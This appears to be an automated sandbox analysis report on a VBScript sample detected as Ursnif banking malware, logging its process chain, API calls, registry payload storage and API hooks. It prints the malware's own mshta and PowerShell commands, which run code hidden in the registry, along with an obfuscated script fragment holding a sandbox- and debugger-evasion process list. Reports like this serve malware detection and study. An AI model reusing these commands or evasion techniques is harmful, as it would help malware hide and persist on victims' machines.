Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F2725F 18_2_00F2725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27E30 18_2_00F27E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F21754 18_2_00F21754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05753570 18_2_05753570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057310E6 18_2_057310E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057390A1 18_2_057390A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05735C88 18_2_05735C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05747B5D 18_2_05747B5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057443B9 18_2_057443B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573FBA9 18_2_0573FBA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573423D 18_2_0573423D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574DAED 18_2_0574DAED
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573E6B4 CreateProcessAsUserA, 18_2_0573E6B4
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 18_2_00F240DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F26EB3 GetProcAddress,NtCreateSection,memset, 18_2_00F26EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27666 NtMapViewOfSection, 18_2_00F27666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F28055 NtQueryVirtualMemory, 18_2_00F28055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057509D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 18_2_057509D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 18_2_0574B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574F7F5 NtQueryInformationProcess, 18_2_0574F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0575079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 18_2_0575079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05746657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 18_2_05746657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 18_2_05740E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05735166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 18_2_05735166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05739D36 NtGetContextThread,RtlNtStatusToDosError, 18_2_05739D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_057455D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 18_2_057455D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745878 memset,NtWow64QueryInformationProcess64,GetProcAddress, 18_2_05745878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_05740CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05748890 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_05748890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574A71C NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 18_2_0574A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05740FBD memset,NtQueryInformationProcess, 18_2_05740FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0574FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 18_2_0574FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05750BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 18_2_05750BAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0573579C NtQuerySystemInformation,RtlNtStatusToDosError, 18_2_0573579C
PE file does not import any functions
Source: cshxvr3e.dll.26.dr Static PE information: No import functions for PE file found
Source: kuljoghz.dll.24.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: sample.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dhqv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dhqv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB252.tmp' 'c:\Users\user\AppData\Local\Temp\kuljoghz\CSCFD41DB177D83417DAD6FB740EC17B379.TMP' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC397.tmp' 'c:\Users\user\AppData\Local\Temp\cshxvr3e\CSC395E5146EDFE427593BFE3FCA45BE18C.TMP' Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@22/20@7/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F22102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 18_2_00F22102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{B68F86DF-9DC3-5870-D74A-210CFB1EE500}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{F660447E-DDE3-9893-178A-614C3B5E2540}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\sample.vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: sample.vbs Static file information: File size 1397160 > 1048576
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdbXP=a source: powershell.exe, 00000016.00000002.885459267.00000200B1696000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.540443568.000001C497429000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: :C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.pdb source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.pdbXP=a source: powershell.exe, 00000016.00000002.885375764.00000200B1621000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000012.00000003.867779108.0000000005C00000.00000004.00000001.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27AB0 push ecx; ret 18_2_00F27AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_00F27E1F push ecx; ret 18_2_00F27E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0575528F push ecx; ret 18_2_0575529F
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_05745529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 18_2_05745529
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.cmdline' Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kuljoghz\kuljoghz.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\cshxvr3e\cshxvr3e.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000012.00000003.794954307.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794836470.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794735521.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.797221471.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794770084.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794874719.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794800647.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.859811207.0000000005BE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794900142.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.794931081.0000000005378000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.801557253.000000000517C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.527a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.5328d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.3.rundll32.exe.52f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.871947216.0000000004FFF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799908702.000000000527A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.799937952.00000000052F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.890326064.00000200BE266000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\sample.vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
